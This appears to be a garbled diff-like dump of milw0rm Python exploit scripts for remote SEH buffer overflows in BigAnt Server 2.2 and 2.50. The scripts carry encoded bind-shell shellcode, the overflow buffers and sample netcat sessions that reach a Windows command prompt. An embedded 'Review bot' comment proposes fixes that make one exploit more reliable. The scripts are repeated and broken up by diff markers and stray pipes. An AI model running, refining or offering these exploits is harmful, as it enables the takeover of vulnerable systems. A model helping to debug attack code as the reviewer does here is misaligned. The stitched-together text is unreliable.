s.send('GET ' + evilbuf + "\n\n")
|
||||
s.close()
|
||||
print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)
|
||||
|
||||
# milw0rm.com [2008-04-15]
|
||||
#!/usr/bin/python
|
||||
###############################################################################
|
||||
# BigAnt Server Ver 2.2 PreAuth Remote SEH Overflow (0day)
|
||||
# Matteo Memelli aka ryujin
|
||||
# www.be4mind.com - www.gray-world.net
|
||||
# 04/13/2008
|
||||
# Tested on Windows 2000 Sp4 English
|
||||
# Vulnerable process is AntServer.exe
|
||||
# Offset for SEH overwrite is 954 Bytes
|
||||
#
|
||||
#------------------------------------------------------------------------------
|
||||
# muts you gave me the wrong pill! it's your fault!!!
|
||||
# I wanna go back to the matrix
|
||||
#------------------------------------------------------------------------------
|
||||
#
|
||||
# bt ~ # ./antserver_exploit.py -H 192.168.1.195 -P 6080
|
||||
# [+] Connecting to host...
|
||||
# [+] Overflowing the buffer...
|
||||
# [+] Done! Check your shell on 192.168.1.195:6080
|
||||
# bt ~ # nc -vv 192.168.1.195 4444
|
||||
# 192.168.1.195: inverse host lookup failed: Unknown host
|
||||
# (UNKNOWN) [192.168.1.195] 4444 (krb524) open
|
||||
# Microsoft Windows 2000 [Version 5.00.2195]
|
||||
# (C) Copyright 1985-2000 Microsoft Corp.
|
||||
#
|
||||
# C:\WINNT\system32>
|
||||
#
|
||||
###############################################################################
|
||||
from socket import *
|
||||
from optparse import OptionParser
|
||||
import sys
|
||||
|
||||
print "[*********************************************************************]"
|
||||
print "[* *]"
|
||||
print "[* BigAnt Server PreAuth Remote SEH Overflow (0day) *]"
|
||||
print "[* Discovered and Coded By *]"
|
||||
print "[* Matteo Memelli *]"
|
||||
print "[* (ryujin) *]"
|
||||
print "[* www.be4mind.com - www.gray-world.net *]"
|
||||
print "[* *]"
|
||||
print "[*********************************************************************]"
|
||||
usage = "%prog -H TARGET_HOST -P TARGET_PORT"
|
||||
parser = OptionParser(usage=usage)
|
||||
parser.add_option("-H", "--target_host", type="string",
|
||||
action="store", dest="HOST",
|
||||
help="Target Host")
|
||||
parser.add_option("-P", "--target_port", type="int",
|
||||
action="store", dest="PORT",
|
||||
help="Target Port")
|
||||
(options, args) = parser.parse_args()
|
||||
HOST = options.HOST
|
||||
PORT = options.PORT
|
||||
if not (HOST and PORT):
|
||||
parser.print_help()
|
||||
sys.exit()
|
||||
|
||||
# Tried with SEH/THREAD/PROCESS but server crashes anyway
|
||||
# [*] x86/alpha_mixed succeeded, final size 698 SEH
|
||||
shellcode = (
|
||||
"\x89\xe1\xda\xc0\xd9\x71\xf4\x58\x50\x59\x49\x49\x49\x49\x49"
|
||||
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
|
||||
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
|
||||
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
|
||||
"\x4b\x4c\x43\x5a\x4a\x4b\x50\x4d\x4b\x58\x4a\x59\x4b\x4f\x4b"
|
||||
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x47\x54\x47\x54\x4c\x4b"
|
||||
"\x47\x35\x47\x4c\x4c\x4b\x43\x4c\x44\x45\x43\x48\x45\x51\x4a"
|
||||
"\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b\x51\x4f\x51\x30\x45\x51"
|
||||
"\x4a\x4b\x47\x39\x4c\x4b\x50\x34\x4c\x4b\x43\x31\x4a\x4e\x46"
|
||||
"\x51\x49\x50\x4a\x39\x4e\x4c\x4d\x54\x49\x50\x42\x54\x44\x47"
|
||||
"\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4c\x34\x47"
|
||||
"\x4b\x46\x34\x47\x54\x47\x58\x42\x55\x4b\x55\x4c\x4b\x51\x4f"
|
||||
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
|
||||
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
|
||||
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x45\x31\x49\x53\x50\x31\x49"
|
||||
"\x4b\x42\x44\x4c\x4b\x47\x33\x50\x30\x4c\x4b\x47\x30\x44\x4c"
|
||||
"\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
|
||||
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x50\x50\x4b\x4f"
|
||||
"\x4e\x36\x42\x46\x51\x43\x42\x46\x43\x58\x47\x43\x50\x32\x42"
|
||||
"\x48\x42\x57\x43\x43\x50\x32\x51\x4f\x51\x44\x4b\x4f\x4e\x30"
|
||||
"\x43\x58\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x4e"
|
||||
"\x36\x51\x4f\x4d\x59\x4d\x35\x45\x36\x4b\x31\x4a\x4d\x45\x58"
|
||||
"\x43\x32\x50\x55\x42\x4a\x44\x42\x4b\x4f\x48\x50\x43\x58\x49"
|
||||
"\x49\x45\x59\x4c\x35\x4e\x4d\x50\x57\x4b\x4f\x48\x56\x46\x33"
|
||||
"\x46\x33\x50\x53\x50\x53\x46\x33\x47\x33\x46\x33\x51\x53\x46"
|
||||
"\x33\x4b\x4f\x4e\x30\x45\x36\x42\x48\x42\x31\x51\x4c\x45\x36"
|
||||
"\x50\x53\x4b\x39\x4d\x31\x4c\x55\x42\x48\x49\x34\x44\x5a\x44"
|
||||
"\x30\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x42\x30\x46\x31"
|
||||
"\x51\x45\x4b\x4f\x48\x50\x43\x58\x4e\x44\x4e\x4d\x46\x4e\x4b"
|
||||
"\x59\x51\x47\x4b\x4f\x48\x56\x46\x33\x50\x55\x4b\x4f\x48\x50"
|
||||
"\x42\x48\x4a\x45\x47\x39\x4b\x36\x47\x39\x51\x47\x4b\x4f\x4e"
|
||||
"\x36\x46\x30\x46\x34\x46\x34\x50\x55\x4b\x4f\x4e\x30\x4a\x33"
|
||||
"\x43\x58\x4a\x47\x44\x39\x49\x56\x44\x39\x46\x37\x4b\x4f\x49"
|
||||
"\x46\x46\x35\x4b\x4f\x48\x50\x42\x46\x43\x5a\x42\x44\x45\x36"
|
||||
"\x42\x48\x45\x33\x42\x4d\x4c\x49\x4d\x35\x42\x4a\x50\x50\x46"
|
||||
"\x39\x47\x59\x48\x4c\x4d\x59\x4a\x47\x43\x5a\x51\x54\x4d\x59"
|
||||
"\x4a\x42\x46\x51\x49\x50\x4c\x33\x4e\x4a\x4b\x4e\x51\x52\x46"
|
||||
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4d\x43\x4c\x4d\x42\x5a\x46\x58"
|
||||
"\x4e\x4b\x4e\x4b\x4e\x4b\x42\x48\x43\x42\x4b\x4e\x4e\x53\x42"
|
||||
"\x36\x4b\x4f\x43\x45\x51\x54\x4b\x4f\x48\x56\x51\x4b\x50\x57"
|
||||
"\x46\x32\x46\x31\x50\x51\x50\x51\x43\x5a\x43\x31\x46\x31\x50"
|
||||
"\x51\x51\x45\x50\x51\x4b\x4f\x4e\x30\x42\x48\x4e\x4d\x49\x49"
|
||||
"\x43\x35\x48\x4e\x50\x53\x4b\x4f\x49\x46\x43\x5a\x4b\x4f\x4b"
|
||||
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
|
||||
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x46\x32\x4b\x4f\x4e\x30\x45"
|
||||
"\x38\x4a\x50\x4c\x4a\x44\x44\x51\x4f\x51\x43\x4b\x4f\x48\x56"
|
||||
"\x4b\x4f\x48\x50\x44\x4a\x41\x41"
|
||||
)
|
||||
|
||||
# 77F8AEDC POP POP RET User32.dll Win 2000 Sp4
|
||||
evilbuf = '\x90'*252 + shellcode + '\xeb\x06\x90\x90' + \
|
||||
'\xDC\xAE\xF8\x77' + '\x90'*8 + '\xE9\x82\xFC\xFF\xFF' + \
|
||||
'C'*1225
|
||||
print '[+] Connecting to host...'
|
||||
s = socket(AF_INET, SOCK_STREAM)
|
||||
# s.connect(('192.168.1.195', 6080))
|
||||
s.connect((HOST, PORT))
|
||||
print '[+] Overflowing the buffer...'
|
||||
s.send('GET ' + evilbuf + "\n\n")
|
||||
s.close()
|
||||
print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)
|
||||
|
||||
# milw0rm.com [2008-04-15]
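Review bot: The final status line reports the wrong port: `print '[+] Done! Check your shell on %s:%d' % (HOST, PORT)` prints the attacked service port (6080 in the header example), while the header transcript reaches the bind shell on 4444. Presumably 4444 is the LPORT baked into the alpha_mixed shellcode; define it once, `BIND_PORT = 4444`, next to the shellcode comment and print `'[+] Done! Check your bind shell on %s:%d' % (HOST, BIND_PORT)`. The shellcode comment should also record the payload type and LPORT (as the sibling BigAnt 2.50 script does) so the number is traceable. Separately, `s.send('GET ' + evilbuf + "\n\n")` may deliver only part of the ~2.2 KB buffer; `s.sendall(...)` guarantees the whole SEH chain lands before the socket is closed.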
|
||||
@ -1,106 +1,106 @@
|
|||
#!/usr/bin/python
|
||||
# BigAnt Server version 2.50 SEH Overwrite - 0day
|
||||
# Written and discovered by Blake
|
||||
# Tested on Windows XP SP3
|
||||
#
|
||||
# $ ./bigant.py 192.168.1.131 6660
|
||||
#
|
||||
# [*] BigAnt Server v2.50 SEH Overwrite 0day
|
||||
# [*] Written and discovered by Blake
|
||||
# [*] Tested on Windows XP SP3
|
||||
#
|
||||
# [+] Connecting to 192.168.1.131 on port 6660
|
||||
# [+] Sending payload
|
||||
# [+] Connect to bind shell on port 4444
|
||||
#
|
||||
# $ nc 192.168.1.131 4444
|
||||
# Microsoft Windows XP [Version 5.1.2600]
|
||||
# (C) Copyright 1985-2001 Microsoft Corp.
|
||||
#
|
||||
# C:\WINDOWS\system32>
|
||||
|
||||
import socket, sys
|
||||
|
||||
if len(sys.argv)!= 3:
|
||||
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
|
||||
sys.exit(0)
|
||||
|
||||
host = sys.argv[1]
|
||||
port = int(sys.argv[2]) # port 6660 by default
|
||||
|
||||
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
|
||||
# EXITFUNC=seh, LPORT=4444, RHOST=
|
||||
shellcode = (
|
||||
"\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
|
||||
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
|
||||
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
|
||||
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
|
||||
"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4b\x49\x4b\x4f\x4b"
|
||||
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x46\x44\x4c\x4b"
|
||||
"\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a"
|
||||
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51"
|
||||
"\x4a\x4b\x50\x49\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50"
|
||||
"\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x43\x37"
|
||||
"\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
|
||||
"\x4b\x50\x54\x46\x44\x46\x48\x44\x35\x4b\x55\x4c\x4b\x51\x4f"
|
||||
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
|
||||
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
|
||||
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49"
|
||||
"\x4b\x43\x54\x4c\x4b\x47\x33\x46\x50\x4c\x4b\x47\x30\x44\x4c"
|
||||
"\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
|
||||
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f"
|
||||
"\x4e\x36\x45\x36\x46\x33\x43\x56\x45\x38\x47\x43\x46\x52\x42"
|
||||
"\x48\x43\x47\x42\x53\x46\x52\x51\x4f\x50\x54\x4b\x4f\x48\x50"
|
||||
"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48"
|
||||
"\x56\x51\x4f\x4d\x59\x4b\x55\x45\x36\x4b\x31\x4a\x4d\x43\x38"
|
||||
"\x45\x52\x46\x35\x43\x5a\x45\x52\x4b\x4f\x48\x50\x45\x38\x49"
|
||||
"\x49\x44\x49\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56\x51\x43"
|
||||
"\x51\x43\x51\x43\x51\x43\x46\x33\x51\x53\x50\x53\x47\x33\x51"
|
||||
"\x43\x4b\x4f\x4e\x30\x42\x46\x43\x58\x42\x31\x51\x4c\x45\x36"
|
||||
"\x46\x33\x4b\x39\x4d\x31\x4c\x55\x45\x38\x4e\x44\x44\x5a\x42"
|
||||
"\x50\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x44\x50\x50\x51"
|
||||
"\x50\x55\x4b\x4f\x48\x50\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
|
||||
"\x49\x46\x37\x4b\x4f\x4e\x36\x50\x53\x46\x35\x4b\x4f\x48\x50"
|
||||
"\x43\x58\x4b\x55\x47\x39\x4c\x46\x50\x49\x46\x37\x4b\x4f\x48"
|
||||
"\x56\x46\x30\x50\x54\x50\x54\x46\x35\x4b\x4f\x4e\x30\x4c\x53"
|
||||
"\x42\x48\x4b\x57\x44\x39\x48\x46\x44\x39\x50\x57\x4b\x4f\x48"
|
||||
"\x56\x51\x45\x4b\x4f\x4e\x30\x42\x46\x43\x5a\x42\x44\x42\x46"
|
||||
"\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x43\x5a\x46\x30\x51"
|
||||
"\x49\x51\x39\x48\x4c\x4d\x59\x4d\x37\x42\x4a\x51\x54\x4b\x39"
|
||||
"\x4a\x42\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x50\x42\x46"
|
||||
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
|
||||
"\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x42"
|
||||
"\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
|
||||
"\x51\x42\x50\x51\x46\x31\x50\x51\x43\x5a\x43\x31\x50\x51\x50"
|
||||
"\x51\x51\x45\x50\x51\x4b\x4f\x48\x50\x42\x48\x4e\x4d\x48\x59"
|
||||
"\x45\x55\x48\x4e\x50\x53\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b"
|
||||
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
|
||||
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x45"
|
||||
"\x38\x4a\x50\x4d\x5a\x43\x34\x51\x4f\x51\x43\x4b\x4f\x4e\x36"
|
||||
"\x4b\x4f\x4e\x30\x41\x41")
|
||||
|
||||
|
||||
payload = "\x41" * 985 # seh overwritten at 989
|
||||
next_seh = "\xeb\x06\x90\x90" # short jump 6 bytes
|
||||
seh = "\x6a\x19\x9a\x0f" # p/p/r from vbajet32.dll
|
||||
nops = "\x90" * 10 # nop sled
|
||||
sc = shellcode # 710 bytes available for shellcode
|
||||
|
||||
print "\n[*] BigAnt Server v2.50 SEH Overwrite 0day"
|
||||
print "[*] Written and discovered by Blake"
|
||||
print "[*] Tested on Windows XP SP3\n"
|
||||
|
||||
print "[+] Connecting to %s on port %d" % (host,port)
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
try:
|
||||
s.connect((host,port))
|
||||
except:
|
||||
print "[x] Error establishing connection\n"
|
||||
sys.exit(0)
|
||||
|
||||
print "[+] Sending payload"
|
||||
s.send("GET " + payload + next_seh + seh + nops + sc + "\r\n\r\n")
|
||||
s.close()
|
||||
print "[+] Connect to bind shell on port 4444\n"
|
||||
|
||||
# milw0rm.com [2009-09-15]
|
||||
#!/usr/bin/python
|
||||
# BigAnt Server version 2.50 SEH Overwrite - 0day
|
||||
# Written and discovered by Blake
|
||||
# Tested on Windows XP SP3
|
||||
#
|
||||
# $ ./bigant.py 192.168.1.131 6660
|
||||
#
|
||||
# [*] BigAnt Server v2.50 SEH Overwrite 0day
|
||||
# [*] Written and discovered by Blake
|
||||
# [*] Tested on Windows XP SP3
|
||||
#
|
||||
# [+] Connecting to 192.168.1.131 on port 6660
|
||||
# [+] Sending payload
|
||||
# [+] Connect to bind shell on port 4444
|
||||
#
|
||||
# $ nc 192.168.1.131 4444
|
||||
# Microsoft Windows XP [Version 5.1.2600]
|
||||
# (C) Copyright 1985-2001 Microsoft Corp.
|
||||
#
|
||||
# C:\WINDOWS\system32>
|
||||
|
||||
import socket, sys
|
||||
|
||||
if len(sys.argv)!= 3:
|
||||
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
|
||||
sys.exit(0)
|
||||
|
||||
host = sys.argv[1]
|
||||
port = int(sys.argv[2]) # port 6660 by default
|
||||
|
||||
# windows/shell_bind_tcp - 696 bytes Encoder: x86/alpha_mixed
|
||||
# EXITFUNC=seh, LPORT=4444, RHOST=
|
||||
shellcode = (
|
||||
"\x89\xe2\xdb\xcc\xd9\x72\xf4\x5f\x57\x59\x49\x49\x49\x49\x49"
|
||||
"\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51\x5a\x6a"
|
||||
"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32"
|
||||
"\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
|
||||
"\x4b\x4c\x42\x4a\x4a\x4b\x50\x4d\x4b\x58\x4b\x49\x4b\x4f\x4b"
|
||||
"\x4f\x4b\x4f\x43\x50\x4c\x4b\x42\x4c\x51\x34\x46\x44\x4c\x4b"
|
||||
"\x50\x45\x47\x4c\x4c\x4b\x43\x4c\x43\x35\x44\x38\x43\x31\x4a"
|
||||
"\x4f\x4c\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x51\x30\x45\x51"
|
||||
"\x4a\x4b\x50\x49\x4c\x4b\x47\x44\x4c\x4b\x45\x51\x4a\x4e\x50"
|
||||
"\x31\x49\x50\x4a\x39\x4e\x4c\x4b\x34\x49\x50\x44\x34\x43\x37"
|
||||
"\x49\x51\x49\x5a\x44\x4d\x45\x51\x48\x42\x4a\x4b\x4c\x34\x47"
|
||||
"\x4b\x50\x54\x46\x44\x46\x48\x44\x35\x4b\x55\x4c\x4b\x51\x4f"
|
||||
"\x46\x44\x43\x31\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c"
|
||||
"\x4b\x51\x4f\x45\x4c\x43\x31\x4a\x4b\x44\x43\x46\x4c\x4c\x4b"
|
||||
"\x4d\x59\x42\x4c\x47\x54\x45\x4c\x43\x51\x49\x53\x50\x31\x49"
|
||||
"\x4b\x43\x54\x4c\x4b\x47\x33\x46\x50\x4c\x4b\x47\x30\x44\x4c"
|
||||
"\x4c\x4b\x42\x50\x45\x4c\x4e\x4d\x4c\x4b\x47\x30\x43\x38\x51"
|
||||
"\x4e\x45\x38\x4c\x4e\x50\x4e\x44\x4e\x4a\x4c\x46\x30\x4b\x4f"
|
||||
"\x4e\x36\x45\x36\x46\x33\x43\x56\x45\x38\x47\x43\x46\x52\x42"
|
||||
"\x48\x43\x47\x42\x53\x46\x52\x51\x4f\x50\x54\x4b\x4f\x48\x50"
|
||||
"\x42\x48\x48\x4b\x4a\x4d\x4b\x4c\x47\x4b\x46\x30\x4b\x4f\x48"
|
||||
"\x56\x51\x4f\x4d\x59\x4b\x55\x45\x36\x4b\x31\x4a\x4d\x43\x38"
|
||||
"\x45\x52\x46\x35\x43\x5a\x45\x52\x4b\x4f\x48\x50\x45\x38\x49"
|
||||
"\x49\x44\x49\x4a\x55\x4e\x4d\x51\x47\x4b\x4f\x48\x56\x51\x43"
|
||||
"\x51\x43\x51\x43\x51\x43\x46\x33\x51\x53\x50\x53\x47\x33\x51"
|
||||
"\x43\x4b\x4f\x4e\x30\x42\x46\x43\x58\x42\x31\x51\x4c\x45\x36"
|
||||
"\x46\x33\x4b\x39\x4d\x31\x4c\x55\x45\x38\x4e\x44\x44\x5a\x42"
|
||||
"\x50\x49\x57\x50\x57\x4b\x4f\x49\x46\x42\x4a\x44\x50\x50\x51"
|
||||
"\x50\x55\x4b\x4f\x48\x50\x45\x38\x49\x34\x4e\x4d\x46\x4e\x4a"
|
||||
"\x49\x46\x37\x4b\x4f\x4e\x36\x50\x53\x46\x35\x4b\x4f\x48\x50"
|
||||
"\x43\x58\x4b\x55\x47\x39\x4c\x46\x50\x49\x46\x37\x4b\x4f\x48"
|
||||
"\x56\x46\x30\x50\x54\x50\x54\x46\x35\x4b\x4f\x4e\x30\x4c\x53"
|
||||
"\x42\x48\x4b\x57\x44\x39\x48\x46\x44\x39\x50\x57\x4b\x4f\x48"
|
||||
"\x56\x51\x45\x4b\x4f\x4e\x30\x42\x46\x43\x5a\x42\x44\x42\x46"
|
||||
"\x43\x58\x43\x53\x42\x4d\x4c\x49\x4b\x55\x43\x5a\x46\x30\x51"
|
||||
"\x49\x51\x39\x48\x4c\x4d\x59\x4d\x37\x42\x4a\x51\x54\x4b\x39"
|
||||
"\x4a\x42\x50\x31\x49\x50\x4a\x53\x4e\x4a\x4b\x4e\x50\x42\x46"
|
||||
"\x4d\x4b\x4e\x50\x42\x46\x4c\x4a\x33\x4c\x4d\x43\x4a\x47\x48"
|
||||
"\x4e\x4b\x4e\x4b\x4e\x4b\x45\x38\x42\x52\x4b\x4e\x4e\x53\x42"
|
||||
"\x36\x4b\x4f\x42\x55\x47\x34\x4b\x4f\x49\x46\x51\x4b\x50\x57"
|
||||
"\x51\x42\x50\x51\x46\x31\x50\x51\x43\x5a\x43\x31\x50\x51\x50"
|
||||
"\x51\x51\x45\x50\x51\x4b\x4f\x48\x50\x42\x48\x4e\x4d\x48\x59"
|
||||
"\x45\x55\x48\x4e\x50\x53\x4b\x4f\x49\x46\x42\x4a\x4b\x4f\x4b"
|
||||
"\x4f\x47\x47\x4b\x4f\x4e\x30\x4c\x4b\x51\x47\x4b\x4c\x4b\x33"
|
||||
"\x48\x44\x45\x34\x4b\x4f\x49\x46\x50\x52\x4b\x4f\x4e\x30\x45"
|
||||
"\x38\x4a\x50\x4d\x5a\x43\x34\x51\x4f\x51\x43\x4b\x4f\x4e\x36"
|
||||
"\x4b\x4f\x4e\x30\x41\x41")
|
||||
|
||||
|
||||
payload = "\x41" * 985 # seh overwritten at 989
|
||||
next_seh = "\xeb\x06\x90\x90" # short jump 6 bytes
|
||||
seh = "\x6a\x19\x9a\x0f" # p/p/r from vbajet32.dll
|
||||
nops = "\x90" * 10 # nop sled
|
||||
sc = shellcode # 710 bytes available for shellcode
|
||||
|
||||
print "\n[*] BigAnt Server v2.50 SEH Overwrite 0day"
|
||||
print "[*] Written and discovered by Blake"
|
||||
print "[*] Tested on Windows XP SP3\n"
|
||||
|
||||
print "[+] Connecting to %s on port %d" % (host,port)
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
try:
|
||||
s.connect((host,port))
|
||||
except:
|
||||
print "[x] Error establishing connection\n"
|
||||
sys.exit(0)
|
||||
|
||||
print "[+] Sending payload"
|
||||
s.send("GET " + payload + next_seh + seh + nops + sc + "\r\n\r\n")
|
||||
s.close()
|
||||
print "[+] Connect to bind shell on port 4444\n"
|
||||
|
||||
# milw0rm.com [2009-09-15]
|
||||
|
|
|
@ -1,62 +1,62 @@
|
|||
#!/usr/bin/python
|
||||
# by hack4love
|
||||
# BigAnt Server version 2.50 SEH Overwrite Universal
|
||||
# discovered by Blake http://www.milw0rm.com/exploits/9673
|
||||
# Tested on Windows XP SP2
|
||||
# gratez to Blake
|
||||
# use >> bigant.py 192.168.1.12 6660
|
||||
|
||||
|
||||
import socket, sys
|
||||
|
||||
if len(sys.argv)!= 3:
|
||||
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
|
||||
sys.exit(0)
|
||||
|
||||
host = sys.argv[1]
|
||||
port = int(sys.argv[2]) # port 6660 by default
|
||||
|
||||
|
||||
shellcode = (
|
||||
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
|
||||
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
|
||||
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
|
||||
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
|
||||
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c"
|
||||
"\x4b\x61\x6c\x63\x35\x73\x48\x67\x71\x48\x6f\x6e\x6b\x50\x4f\x45"
|
||||
"\x48\x6e\x6b\x53\x6f\x61\x30\x73\x31\x38\x6b\x53\x79\x4e\x6b\x66"
|
||||
"\x54\x6e\x6b\x46\x61\x38\x6e\x30\x31\x6b\x70\x6e\x79\x6e\x4c\x4f"
|
||||
"\x74\x79\x50\x74\x34\x44\x47\x4f\x31\x59\x5a\x76\x6d\x55\x51\x59"
|
||||
"\x52\x68\x6b\x4a\x54\x35\x6b\x71\x44\x65\x74\x37\x74\x31\x65\x4a"
|
||||
"\x45\x6e\x6b\x73\x6f\x44\x64\x55\x51\x4a\x4b\x50\x66\x4c\x4b\x44"
|
||||
"\x4c\x30\x4b\x6e\x6b\x53\x6f\x37\x6c\x46\x61\x58\x6b\x6c\x4b\x77"
|
||||
"\x6c\x6e\x6b\x46\x61\x5a\x4b\x4f\x79\x31\x4c\x47\x54\x37\x74\x6a"
|
||||
"\x63\x74\x71\x59\x50\x70\x64\x6e\x6b\x51\x50\x50\x30\x6e\x65\x4b"
|
||||
"\x70\x72\x58\x64\x4c\x6c\x4b\x71\x50\x56\x6c\x4e\x6b\x52\x50\x57"
|
||||
"\x6c\x6c\x6d\x4c\x4b\x63\x58\x73\x38\x5a\x4b\x45\x59\x4e\x6b\x4f"
|
||||
"\x70\x4c\x70\x35\x50\x43\x30\x63\x30\x4c\x4b\x53\x58\x77\x4c\x73"
|
||||
"\x6f\x56\x51\x48\x76\x53\x50\x66\x36\x4f\x79\x39\x68\x6f\x73\x39"
|
||||
"\x50\x61\x6b\x30\x50\x61\x78\x4a\x50\x6c\x4a\x73\x34\x33\x6f\x45"
|
||||
"\x38\x6d\x48\x49\x6e\x6c\x4a\x46\x6e\x76\x37\x69\x6f\x48\x67\x45"
|
||||
"\x33\x73\x51\x72\x4c\x71\x73\x63\x30\x41")
|
||||
|
||||
|
||||
payload = "\x41" * 985
|
||||
next_seh = "\xeb\x06\x90\x90"
|
||||
seh = "\xc3\x20\xc4\x6b" #MFC42.DLL
|
||||
nops = "\x90" * 10
|
||||
sec = shellcode
|
||||
|
||||
print "[+] Connecting to %s on port %d" % (host,port)
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
try:
|
||||
s.connect((host,port))
|
||||
except:
|
||||
print "[x] Error establishing connection\n"
|
||||
sys.exit(0)
|
||||
|
||||
print "[+] Sending payload"
|
||||
s.send("GET " + payload + next_seh + seh + nops + sec + "\r\n\r\n")
|
||||
s.close()
|
||||
|
||||
# milw0rm.com [2009-09-15]
|
||||
#!/usr/bin/python
|
||||
# by hack4love
|
||||
# BigAnt Server version 2.50 SEH Overwrite Universal
|
||||
# discovered by Blake http://www.milw0rm.com/exploits/9673
|
||||
# Tested on Windows XP SP2
|
||||
# gratez to Blake
|
||||
# use >> bigant.py 192.168.1.12 6660
|
||||
|
||||
|
||||
import socket, sys
|
||||
|
||||
if len(sys.argv)!= 3:
|
||||
print "\n[*] Usage: %s <ip> <port>\n" % sys.argv[0]
|
||||
sys.exit(0)
|
||||
|
||||
host = sys.argv[1]
|
||||
port = int(sys.argv[2]) # port 6660 by default
|
||||
|
||||
|
||||
shellcode = (
|
||||
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
|
||||
"\x49\x49\x49\x49\x37\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x41"
|
||||
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x51\x32\x42\x42\x32\x41"
|
||||
"\x41\x30\x41\x41\x42\x58\x38\x42\x42\x50\x75\x4b\x59\x4b\x4c\x59"
|
||||
"\x78\x52\x64\x63\x30\x65\x50\x53\x30\x4e\x6b\x57\x35\x77\x4c\x6c"
|
||||
